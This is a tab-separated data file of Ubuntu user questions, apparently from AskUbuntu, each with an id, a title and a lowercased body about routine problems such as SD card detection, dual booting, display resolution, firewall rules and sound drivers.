413171	ubuntu 12.04.2 sd card is not detected	my sd card is not being detected at all no matter what i do . i am using ubuntu 12.04 , on : hp pavilion g6 2552sa intel® core™ i5-3210m cpu @ 2.50ghz × 4 64-bit the following commands were used with the sd card inserted . lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 003 : id 05c8:0348 cheng uei precision industry co. , ltd ( foxlink ) ls -la /dev/sd* brw-rw -- -- 1 root disk 8 , 0 jan 30 17:04 /dev/sda brw-rw -- -- 1 root disk 8 , 1 jan 30 17:04 /dev/sda1 brw-rw -- -- 1 root disk 8 , 2 jan 30 17:04 /dev/sda2 brw-rw -- -- 1 root disk 8 , 3 jan 30 17:04 /dev/sda3 sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x339d0cd5 device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . sudo lspci -nn [ sudo ] password for verin : 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm76 express chipset lpc controller [ 8086:1e59 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:539b ] 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader [ 10ec:5229 ] ( rev 01 ) let me know if you need any other information , just ask and thank you for your help .
413172	dual boot windows problem	i 'm attempting to install ubuntu on my samsung all-in-one computer . i 've followed the instructions here ( https : //help.ubuntu.com/community/windowsdualboot ) but i 've hit a problem . during the installation processes the documentation states : choose the first option , which should say `` install them side by side , choosing between them each startup '' . but , i do not see that option . i 'm on the `` installation type '' on the installation , but all i see is two options 1 ) `` replace windows 8 with ubuntu '' or `` something else '' . when i click `` something else '' i do n't see any option that mentions installing them side by side . all i see is a screen asking me to partition . what 's the best way to dual boot from here ? i have 500gb free space that i want to install ubuntu on .
413176	how can i stream my screen to other computers ?	i am looking for something like the tightvnc projector but cross-platform and free if possible . i have seen stuff like italc but it was hard to setup on windows and long-winded for what i need . all i need to do is pass a command on start-up to create a server for my desktop 's screen ( running 12.10 lts ) . i have a laptop running 13.10 to use as a client . i would also like a viewer on my windows and ubuntu clients to start-up in their respective ways . ( i am aware of the procedure of this . ) thanks in advance
413177	having trouble setting up 5 screen system with x-plane flight simulator . any help would be awesome	ok , so i 'm building a big five screen flight simulator running x-plane . the system is set up as such : a master computer running windows 7 is connected via a crossover ethernet cable to a slave ( outside visual ) computer running ubuntu . both computers are running a copy of x-plane . the ubuntu computer was purchased from the flight simulator company precision flight controls and has three gpus , each having two outputs . there are six screens in total . five for the outside visual and one that maintains the ubuntu desktop . the monitors are set up through nvidia server x . here is my problem : when everything is up and running , all of my ubuntu screens are working except for one outside visual . the screen will give the `` no signal '' message every time . i 've checked all of the settings in nvidia server x and it seems to recognize that the monitor is there ( it shows the brand name of the monitor ) , but it wo n't send an image to the screen for some reason . i know next to nothing about ubuntu/linux . is there some sort of batch file or something i need to edit ? all of the obvious things have been checked ( cables tight , monitor functionality , etc. ) . thanks !
413178	ubuntu 13.10 , format the entire harddrive and install windows 8.1 ( solved )	i 'm stuck with my laptop as i explained here : windows 8.1 does n't appear in grub2 i ca n't find a solution . to resume : i have a asus n53s with ubuntu 13.10 installed and windows 8.1 but grub ca n't see it . ( see the refered post for details ) my question is : if i format the entire disk , ubuntu and windows , and create my partitions with the windows 8.1 disk ( just before installation ) , my hard drive will be totaly empty and i will install only windows . will i boot automaticaly on windows ? i mean , will grub be erased after the formatting ? and the windows boot manager will appear ? is you do n't understand what i mean , please , ask questions . thanks for your time ,
413186	step by step installation of mediawiki math extension	i struggle with the installation of the mediawiki math extension . i recently downloaded mediawiki and everything works well . now i want to display math equations , so i downloaded mediawiki-math via apt . afterwards i added the following lines to my localsettings.php and called the update.php file in the maintenance folder . require_once ( `` $ ip/extensions/math/math.php '' ) i created texvc via make file and set the access rights to 755 . as the mediawiki help says , i have to add the following settings to my localsettings.php : $ wgmathdirectory = `` /var/lib/mediawiki/math/ '' ; $ wgmathpath = `` { $ wguploadpath } /math '' ; $ wgtmpdirectory = `` { $ wguploaddirectory } /tmp '' ; but afterwards pages with < math > remain blank without an error message . is there an easy way to install the math extension ? i am a little bit depressed , because nearly every guidance i found explains different steps to get the math work .
413189	folder permissions : can anyone explain wht i can not write to this file without sudo	i am having a huge amount of trouble with permissions in /var/www can anyone explain why i can not write here ? all permission look correct to any help would be great .
413191	bluetooth on ubuntu 13.10 sony vaio- can i manage multiple usb bluetooth adapters ?	first post , so bear with me . i was wondering if it 's possible to manage multiple usb bluetooth adapters and run them at the same time . the computer recognizes both when they are plugged in , but prioritizes one over the other for normal bluetooth connections . i would love to be able to connect to multiple bluetooth speakers ( each with their own receiver ) in a setting like this : computer usb adapter a to speaker receiver a computer usb adapter b to speaker receiver b audio output to both a and b the same . i know i ca n't use one dongle to connect to two speakers , which is why i 'm asking . here is my info : lsusb bus 002 device 003 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 002 device 004 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) also hciconfig hci1 : type : br/edr bus : usb bd address : 00:11:22:98:76:54 acl mtu : 1021:4 sco mtu : 180:1 up running pscan iscan rx bytes:398 acl:0 sco:0 events:17 errors:0 tx bytes:305 acl:0 sco:0 commands:19 errors:3 hci0 : type : br/edr bus : usb bd address : 00:11:22:98:76:54 acl mtu : 1021:4 sco mtu : 180:1 up running rx bytes:750 acl:0 sco:0 events:45 errors:0 tx bytes:390 acl:0 sco:0 commands:30 errors:2 and finally hci0 : type : br/edr bus : usb bd address : 00:11:22:98:76:54 acl mtu : 1021:4 sco mtu : 180:1 up running rx bytes:1027 acl:0 sco:0 events:48 errors:0 tx bytes:399 acl:0 sco:0 commands:33 errors:2 features : 0xff 0x3e 0x09 0x76 0x80 0x01 0x00 0x80 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : rswitch hold sniff link mode : slave accept name : 'barf' class : 0x6e0100 service classes : networking , rendering , capturing , audio , telephony device class : computer , uncategorized hci version : 2.0 ( 0x3 ) revision : 0x50 lmp version : 2.0 ( 0x3 ) subversion : 0x3 manufacturer : mitel semiconductor ( 16 ) thanks so much ! ! !
413192	ubuntu 12.04 + xorg - several screens with its own mouse pointer - is it possible ?	i have an app that uses the mouse pointer ( via java robot class ) . so there is the next problem : only one instance of that app can run at one time ( as i have 1 screen with 1 mouse cursor ) . question : is it somehow possible to create several screens , each with its own mouse pointer in xorg ? thus i could run several instances of my app , and each could work with its own mouse pointer .
413193	can not upgrade ubuntu 13.04 to 13.10 ( w : failed to fetch http : // ... /ubuntu/dists/natty-backports/ ... )	i can not upgrade my ubuntu from 13.04 to 13.10 this is error while i try to upgrade : w : gpg error : http : //download.opensuse.org release : the following signatures were invalid : keyexpired 1386276565 w : failed to fetch http : //th.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found w : failed to fetch http : //th.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found w : failed to fetch http : //th.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/source/sources 404 not found w : failed to fetch http : //th.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what have i tried already ? unchecked something like ..from cd-rom.. on ubuntu software center > software source . tried to use this command `` sudo rm -rf /var/lib/apt/lists/* '' tried to change download server how can i solve this problem ?
413195	ubuntu source code , for what ?	i found this link which contains ubuntu 12.04 source code . it 's about 3 dvds and sizing 10gb . i have downloaded all dvds but i did n't find any installers in it . i wonder if there is a way i can make a custom ubuntu cd by just choosing the needed open source software from my company . is that possible ? what can i benefit from these dvds right now ? any help would be appreciated . by the way i do n't find an answer for my question in this question
413196	ca n't install ubuntu 64 bit	i have an hp pavilion g7 running windows 7 64 bit . i have 3.48 gigs of usable ram and 185 gigs of free hard drive space . i downloaded oracle 's virtual box for windows 7 64 bit and ubuntu 12.04 64 bit . when i open the virtual box to install ubuntu it says it needs an x86-64amd cpu but it detects an i686 cpu and wo n't continue with the install . if my hardware meets the requirements i do n't understand why it wo n't install ... any suggestions ?
413197	windows maximize to full screen and bottom hides behind the panel	i have one monitor above another . i would like to have a panel at the top of the bottom monitor and another at the bottom of the top monitor . putting the panels in place works as expected . however , when the panels are on the edge of a screen that butts up against another screen , space is not reserved for the panel when maximizing windows . so , if i try and maximize firefox , i ca n't see the `` addons '' bar at the bottom . i have tested this in both kubuntu and xubuntu with similar results . i found a bug for kde that describes the problem and a comment says : panels in between monitors are not supported , and this is a limitation in the freedesktop specification for reserving space for things like panels . there is another forum posts that talks some about this : http : //forum.kde.org/viewtopic.php ? f=66 & t=102303 is there any way to get the limitation in the specification addressed and/or are there any workarounds to make the applications maximize without being behind the panels ?
413201	network-manager device not managed with virt-manager	i am using ubuntu 12.04.4 64 bit . after installing virt-manager , i found my scenario would be to user bridge networking , so i managed to let my machines works with bridge interface br0 . from that time i lost the network-manager . it shows that device is not managed . can i bring my network interface to work in parallel with virt-manager ?
413211	ca n't find xp boot after dual boot installation	the machine in question is offline and i may have 'hatchet jobbed ' the 12.04 installation . ubuntu seems fine so far ( how would i know ? ) and the xp partition is verifiably intact . somewhere i have seen a warning that boot segments can be moved too 'deep ' onto the hard drive to be seen . if this is my problem , are they findable/relocatable ?
413215	installing ubuntu 13.10 on a partition in windows 8.1 pc with uefi firmware	i had purchased a new asus g55v laptop , that comes with installed windows 8 . a few months ago , i tried to install ubuntu on a separate partition . however , things went haywire and my laptop was unusable for almost 2 days . later , i figured a way to bring it back to normal . since then , i have been using ubuntu on virtual box . recently i received an update on my windows . and , now i have windows 8.1 q1 . is it possible to install ubuntu on it ( without making windows unusable ) ? q2 . if yes , can anyone share a step-by-step guide ? thanks a lot .
413216	text editor i can use to edit gcode ?	i 've been messing around with gedit and geany which both support syntax highlighting for many languages but not for cnc/gcode . and neither have made it easy to make a custom language color scheme . on windows i used notepad++ to edit my gcode . it was pretty easy to set it up so that any g-command was green or and m-command red , and xyz movements in yellow etc ... i 'd like to do the same thing with gedit but i do n't know how . help ?
413224	getting an error while mounting machine_config	i am trying to boot my system but , it is giving me an error as `` an error occurred while mounting home/jack/jack-app/machine_config `` press s skip to mounting or m for manual recovery after this i restarted the system it worked fine . for troubleshooting this error i look into the /var/log/boot.log . then i got the actual error as mount : special device /machine_config/jack does not exist mountall : mount /home/jack/jack-app/machine_config [ 601 ] terminated with status 32 mountall : filesystem could not be mounted : /home/jack/jack-app/machine_config so i tried to look into the /machine_config directory in that jack directory is not present . instead of it lost+found directory is present . i do n't know any reason how this directory is formed . so i have following questions : how this lost+found directory formed . if i created a directory as jack in the /macine_config folder is it causing any problem or any other solution for that problem when i comment the issue line is it cause some problem to others . thanks in advance . here is my fstab file # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=cb677870-6f0a-49bf-b6f6-0b6f25e7180f /boot ext4 sync , user_xattr , relatime 0 2 /dev/mapper/jack-logging /var/log ext4 user_xattr , relatime 0 2 /dev/mapper/jack-machine_config /machine_config ext4 user_xattr , relatime 0 2 /dev/mapper/jack-videos /videos ext4 user_xattr , relatime 0 2 /var/log/jack /home/jack/video-jack-app/log none bind , nobootwait 0 0 /machine_config/jack /home/jack/video-jack-app/machine_config none bind , nobootwait 0 0 /videos/jack /home/jack/video-jack-app/video-output none bind , nobootwait 0 0 /dev/mapper/jack-swap none swap sw 0 0 here is my output of df command udev 1917840 4 1917836 1 % /dev tmpfs 772248 876 771372 1 % /run none 5120 0 5120 0 % /run/lock none 1930620 2224 1928396 1 % /run/shm none 102400 0 102400 0 % /run/user /dev/mapper/jack-machine_config 11895 1132 10149 11 % /machine_config /dev/sda1 10321208 824604 8972316 9 % /boot /dev/mapper/jack-logging 12385456 232180 11587052 2 % /var/log /dev/mapper/jack-videos 30963708 178868 29211984 1 % /videos
413226	unlocking the kiosk settings	ive just very new to ubuntu and have just installed ubuntu 12.04 on virtual box and have run the kiosk script and played around with changing the home page and also locking the kiosk . what i cant do or work out now is how to unlocking the kiosk so i can get back in ubuntu . kind regards
413228	disk failure and bootloading problem	i have the next problem , every 3 minutes a little message tells me there is a hard disk error . so when i asked it to tell me more it said there is a risk for my hard , failure . i don ' t know why , as my computer is 2 years old and i did n't use it excessively . and also i can not open my computer . it does n't enter ubuntu . it has some boot-loader error .
413229	how to installation startup-manager on ubuntu 13.10 ?	i want to install startup-manager on ubuntu 13.10 . i want to enable an older kernel , to see installed services , etc . i typed the code sudo apt-get install startup-manager but i get the following message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package startup-manager
413230	tags - nautilus ubuntu 12.04	i two questions about nautilus tags . i simply do n't have the `` add tag '' option when i right click a folder or a file i am running ubuntu 12.04 lts with nautilus 1:3.4.2-0ubuntu8 . i read that the tags was added in ubuntu 12.04 , so where are they ? can i have numerical tags ? i have tons of movies in a directory called `` movies '' . my problem is that all the movies are in a directory with their name . so its a directory of movie-directorys . i want to arrenge the directories by a tag that contains the year the movie was published . is there a way to do this with tags ? ( same with the movie 's resolution )
413234	plymouth problem , black screen	i get a black screen after grub , with a underscore cursor in the top left corner , it has to do with plymouth i know that . just not how to fix it . i tried using plymouth-manager to change the boot image , and told it i was using proprietary drivers amd radeon hd 7970 . i tried running dpkg-reconfigure plymouth from recovery in root and get `` dpkg-trigger : error : unable to ope/create triggers lockfile '/var/lib/dpkg/triggers/lock ' : read-only file system ubuntu 13.10 , never had this problem before . i am in recover menu ( filesystem state : read/write ) dpkg did nothing . problem occured after i tried changing bootscreen with plymouth-manager i was able to change the image back to the original one . i saw the ubuntu load image for a moment , and then once again got the black screen with underscore in the top left .
413240	ati fglrx driver problem	after installing the fglrx drivers from the lubuntu software center , my computer stopped working . actually only after i rebooted . i have a 1080p monitor and it says `` please set 1920*1080 @ 60hz as resolution '' . pressing ctrl+alt+f1 does n't work . i would like to unistall them from the live cd because i do n't want to format the pc ! can anyone help me ?
413241	what is detailed solution for ubuntu 13.10 black screen ?	a few days ago i installed ubuntu 13.10 along with windows 8 `` dual boot '' on my hp laptop every thing goes fine until now . when i restart my ubuntu it loads will until ubuntu logo appears on screen and then it goes on black screen and no response to any action except pressing on power button cause ubuntu logo screen appear and my laptop shuts down so , i want a detailed description to my problem and in details how to solve it ?
413242	12.04 no display when booting	new 12.04 install no display [ from fresh install ] after restart and symptom continues after multiple reboots , no readout , but a backlight is activating . system is thinkpad x60 tablet with ultrabase dock it will only display the login screen after connecting=to an external monitor and toggling monitor hot key . once displaying the 2nd monitor can be disconnected and 12.04 runs/operates satisfactory . contemplated an edit of grub config file to output verbose , but with the situation it seems to be pointless . not an absolute beginner to linux but first attempts with ubuntu searched for answers on a few pages , hoping somebody might have some ideas . cheers
413244	xubuntu 12.04 lenovo t500 hardware mute button will not unmute	have xubuntu 12.04 installed on lenovo t500 thinkpad . the hardware mute button will not unmute , and i 'd like it to work for mute and unmute . it works to mute , but i have to open a terminal window and run alsamixer to unmute headphones and master volume . xubuntu 12.04 lenovo t500 hardware mute button will not unmute . the volume control buttons will not unmute , and neither will the pulseaudio volume control . the http : //ubuntuforums.org/showthread.php ? t=2195471 & highlight=lenovo+mute suggestion ( code , below ) did not work . amixer set master 50 % sudo alsactl store echo 'amixer set master 50 % ' > > ~/.profile
413245	configuring ufw and ipredator vpn	i am running a vpn via ipredator on ubuntu 12.04 desktop , which works perfectly , when ufw is disabled . when i enable ufw , i logically can not establish a connection . ipredator states that i have to meet the following ip-range to get things working : first ip address : 46.246.32.0 last ip address : 46.246.63.255 net mask : 255.255.224.0 i already did a basic ufw configuration , following this tutorial : 25005/tcp allow anywhere 25005/udp allow anywhere 25005/tcp allow anywhere ( v6 ) 25005/udp allow anywhere ( v6 ) 25,53,80,110,443/tcp allow out anywhere 53,67,68/udp allow out anywhere 51413/tcp allow out anywhere 51413/udp allow out anywhere 6969/tcp allow out anywhere 25,53,80,110,443/tcp allow out anywhere ( v6 ) 53,67,68/udp allow out anywhere ( v6 ) 51413/tcp allow out anywhere ( v6 ) 51413/udp allow out anywhere ( v6 ) 6969/tcp allow out anywhere ( v6 ) how can i configure the mentioned ip-range in ufw ?
413250	how to save individual session on ubuntu when remote login through rdp ?	i have my ubuntu installed on vms , and i have mac and windows on my laptop . i frequently rdp to my ubuntu , and it 's really irritating when i have to open everything again after i login . is there a way to save my session and the next time i rdp into my ubuntu i should be able to continue with the same session ?
413254	mac filtering for dhcp3 server	i am setting up a school network and i have an ubuntu 13.10 sever . i am looking for a way to deny all devices to get an ip , except for the devices which mac address i specify in a certain list . as i was browsing another server to see how that is configured , i saw an /etc/ethers . what is that all about ? thank you in advance for your answers .
413255	how to re-install thunderbird	i have thunderbird installed . i would like/need to re-install it completely . i do not see any option to do it in settings or anywhere . also , i ca n't find a menu entry or equivalent to remove an account from thunderbird . that is the reason i need to re-install it .
413257	vsync with kernel 3.13	i have ubuntu 13.10 installed and i was able to turn off vsync in cs 1.6 ( steam ) from the game menu . i have upgraded the kernel to 3.13 and now turning off vsync from the game menu has no effect . my video card is radeon 4850 and i am using the open source drivers .
413259	no sound ( no sound card detected )	i 'm installing an old laptop for a mentally challenged person who only uses it to listen to music and surf online . a packard bell easynote s5 . i 've installed lubuntu 13.10 and everything works perfectly after a little bit of work . the only problem i have n't been able to surmount was that there is no sound . i first tried to open alsamixer and it game the following output can not open mixer : file or directory does not exist neither could i run : cat /proc/asound/card0/codec* | grep codec cat /proc/asound/cards outputs -- - no soundcards -- - sudo lspci -v outputs the following : 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 04 ) subsystem : packard bell b.v. device c011 flags : fast devsel , irq 5 memory at b0000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link i tried installing the realtek drivers but those failed does anyone have a solution ? edit : i got a weird suggestion to try editing /etc/modprobe.d/alsa-base.conf i now get a sound icon but still no sound ( duh , still no sound card detected ) oke , i 've discovered that the installation process did n't properly install the sound modules since it apparently does n't have access to the linux-restricted-modules i 'm attempting to fix this now edit2 : did n't work : ( it might be usefull to note that the sound did work on the ( old ) version of opensuse that i installed about 7 years ago on this laptop edit3 : you know what . screw alsa . i 'll just use magic and make drivers appear i found the correct drivers for my sound card ( from opensound.com 's oos package ) . it was discontinued in 2008 and does n't work with my ( much newer ) kernel : ( the good thing is : i 'm getting close my only options are to either use a really old kernel version or install windows xp or something like that .
413261	deja-dup failing with `` host key verification failed ''	a remote ssh sever i use for backup recently changed its keys . i removed the relevant line from ~/.ssh/known_hosts , so i can log into it without any trouble . deja-dup does not seem to take note of that and fails repeatedly complaining about the new key . i expect the problem is deja-dup has its own key cache , but i am not sure where that is stored . any suggestions ?
413262	installation interrupted 12.04 , usb method	i am very new to linux operating systems , and i recently tried to download ubuntu on my girlfriends computer using a usb drive . however , when the installation process was close to being complete , my girlfriend unknowingly removed the usb from the slot , and all hell broke lose , the computer screen went black , i had left prior to the incident , so she told me she tried to reset the computer and it brought her to a page with a bunch of confusing encryptions and options , she is n't very technologically inclined , but i am assuming this is a problem that can be fixed , although my countless hours of research has deemed inconclusive , could someone give me a little insight on how to solve this mess ? it would be much appreciated .
413268	how to restore windows 7	i am trying to dual boot ubuntu 10.10 alongside windows 7 , after install ubuntu iam directly entering into ubuntu only . no dual boot is coming , and data is also not showing . could you please tell me how to restore winodws 7 . actually i tried ubuntu as a dual boot . but windows 7 is not coming . directly its entering into ubuntu .
413273	need help with screen resloutions	so my screen resolution is off my screen because i use a tv so i use a custom screen resolution 1824x1026 is what i use . while i try to set it to that resolution i get these messages : brian @ brian-desktop : ~ $ cvt 1824 1026 60 # 1824x1026 59.94 hz ( cvt 1.87m9 ) hsync : 63.84 khz ; pclk : 155.25 mhz modeline `` 1824x1026_60.00 '' 155.25 1824 1936 2128 2432 1026 1029 1034 1065 -hsync +vsync brian @ brian-desktop : ~ $ xrandr -- newmode < modeline > bash : syntax error near unexpected token `newline' brian @ brian-desktop : ~ $ xrandr -- newmode `` 1824x1026_60.00 '' 155.25 1824 1936 2128 2432 1026 1029 1034 1065 -hsync +vsync x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 39 current serial number in output stream : 39 brian @ brian-desktop : ~ $ also using hdmi-0 output as well if that helps anyone any help would be appreciated thanks . when i xrandr brian @ brian-desktop : ~ $ xrandr screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 16384 x 16384 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 160mm x 90mm 1280x720 60.0 + 59.9 1920x1080 60.0* 59.9 30.0 30.0 1360x768 60.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x480 59.9 30.0 640x480 75.0 72.8 59.9 59.9 dp-0 disconnected ( normal left inverted right x axis y axis ) dvi-d-0 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) 1680x1050_60.00 ( 0x2b6 ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1050 start 1053 end 1059 total 1089 clock 60.0hz 1824x1026_60.00 ( 0x2ba ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1059 start 1053 end 1059 total 1089 clock 60.0hz 1824x1026_60.00 ( 0x2bb ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1059 start 1053 end 1059 total 1089 clock 60.0hz 1280x720_60.00 ( 0x2c3 ) 74.5mhz h : width 1280 start 1344 end 1472 total 1664 skew 0 clock 44.8khz v : height 720 start 723 end 728 total 748 clock 59.9hz brian @ brian-desktop : ~ $
413274	connecting ubuntu box into microsoft active directory	i need to join my ubuntu 12.04 pc to an active directory domain . i know that there are two applications that would help me do the job : likewiseopen and centrify-directcontrol . but , before i choose which one to use , i will really appreciate your expert opinions and experience with these applications . would like to get your feedback on ease of installation , stability , user friendliness , etc .
413278	installing a new package in ubuntu linux	i have a problem with installing a new package in ubuntu , i want to install library pcrafter , and i have downloaded the files from here ( crafter-0.2.tar.gz ) but when i use this command `` sudo apt-get install libpcap0.8 libpcap0.8-dev ubuntu gives me this error : e : could n't find package libpcap0.8-dev now i do n't know what should i do ? where is the problem ? and i have another question too , i want to use mpi in my program to make it parallel , can i do this with programming in ubuntu ? i mean is it possible ?
413282	configure private openstack with juju	we have a working openstack ( grizzly ) cloud and want configure juju to work with it . i follows https : //help.ubuntu.com/community/ubuntucloudinfrastructure . but i can not find `` juju environment config '' in horizon/settings page ( only user settings is available ) . the api endpoints has services : compute network image volume ec2 identity i also can download openstack rc file and ec2 credentials but what i should put in environments.yaml ? i got error when try to bootstrap : error failed to get object provider-state from container juju-aced10adfad7e3020fbc207e0d70aee6 caused by : authentication failed caused by : failed executing the request https : // : /v2.0//tokens caused by : post https : // : /v2.0//tokens : local error : record overflow the auth_url is correct which i got from api endpoints as well as openstack rc file .
413284	installing tremulous on 64-bit ubuntu 13.10	i want to install a game that looks really fun , called tremulous , but when i run the installer it says : /usr/local/bin/tremulous : error while loading shared libraries : libsdl-1.2.so.0 : can not open shared object file : no such file or directory i 'm new to linux , so i do n't really know what this means , but i read somewhere that it has something to do with it being 32 bit when i have 64 bit . can anyone help ?
413285	new hard drive not being detected , can not boot from ubuntu cd ?	ok , friends , i have a hard drive question ( not specifically about ubuntu ) : so , i accidentally spilled water all over the keyboard of my dell latitude d610 laptop -- and then it would only sometimes detect the hard drive , and when it did detect it , it would crash after a few minutes . so , i ordered a new hard drive and installed it , thinking it would solve the problem , but come to find out , it brought the same error : '' hdd error : no boot device detected . press f1 to try again , or f2 to enter setup . '' i looked in the bios to see if it said that it was detected , and it was n't . so , does anyone have any advice on getting this to work ? are the hard drive readers fried ? oh , and i attempted to boot from an ubuntu live cd , which i have previously done successfully on this same laptop , but now it boots to the desktop background , and then sits there - nothing about installing ubuntu or trying it out or anything come up . then , after a while , the screen goes black . any advice for this , please ? thanks !
413290	installing packet tracer on xubuntu	i have a trouble getting packet tracer running on xubuntu . i have installed it as instructed this guide how do i run cisco packet tracer 6.0.1 ? it has appeared in the menu under internet and it does not launch . so i went to this directory /usr/local/packettracer6/bin/packettracer6 and run packettracer6 , i get an error saying : failed to execute file `` packettracer6 '' . failed to execute child process `` /usr/local/packettracer6/bin/packettracer6 '' ( no such file or directory ) . can anyone help . i am sure its something obvious but i am struggling with .
413293	samsung arm chomebook no sound in dual os with crouton	i found this fix https : //bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1246587 but i do n't know how to mount the chrome os , anyone have fix for me ? running ubuntu 12.04 with utilty
413298	how do i exit from dash -n ?	i 've connected to an ubuntu machine using ssh . according to dashasbinsh on ubuntu wiki dash is used in place of bash by default . the article says you can use dash -n to check that a script will run under dash without actually running it apparently the -n means noexec . out of shear curiosity , i ran the command dash -n. i was greeted with a prompt that i could not exit . user @ remote : ~ $ dash -n $ exit $ exit ; $ quit $ -- help $ help $ ^c $ how do i abort what i 'm doing and return ?
413304	lexmark pro805 all-in-one printer fails on xubuntu 12.04 & 13.10	downloaded and installed lexmark 's ubuntu 12.04 64-bit driver from http : //support.lexmark.com/index ? segment=support & userlocale=en_us & locale=en & productcode=lexmark_prestige_pro805 & page=product & frompage=null # 2 for their pro805 all-in-one printer which sits on 192.168.0.6 but printing fails on xubuntu 12.04 & 13.10 - here 's the log from /var/log/cups/error_log available for download at https : //drive.google.com/file/d/0b-lyva3f8ygjdg1qrkhsz1b0y00
413309	an ability to make my caps work as ctrl again	when are you going to recover the ability to make caps work like ctrl . like in all previous versions ? this is really critical as i am using emacs key-bindings and this is a one huge stopper and forces me to drop ubuntu , at least until i see it fixed .
413310	where to find default/ test page for apache2	i have a vps running ubuntu 13.10 and has an apache2 website , and whenever i go to the vps 's ip http : //5.231.37.8 , i get the default/test page for apache instead of my website located in /var/www . it 's an html + css website . edit : my solution below
413312	ubuntu 12.04 lts blocking access from other network pcs	one ubuntu 12.04 laptop connects to the internet ok , but i ca n't ping that laptop . i can ping any pc on the network from any other , but this one we can call it ( w ) . it is causing a issue as the ( w ) pc can not see the other pcs on the network and we like to share files . i will add i have checked the firewall and even disabled it and checked to make sure port 22 is listening .
413315	how to install line 6 kb 37 in ubuntu ?	is there a good way to install line 6 toneport kb37 ? so that it functions for monitoring , recording would be nice too but not as necessary .
413317	lubuntu 13.10 package held back	i have recently upgraded my lubuntu flavor to 13.10 saucy salamander . however in a recent update , cairo-dock is being held back . i 've combed through the forums and the typical fixes are not working for this . is it because cairo dock is n't up to speed with 13.10 ?
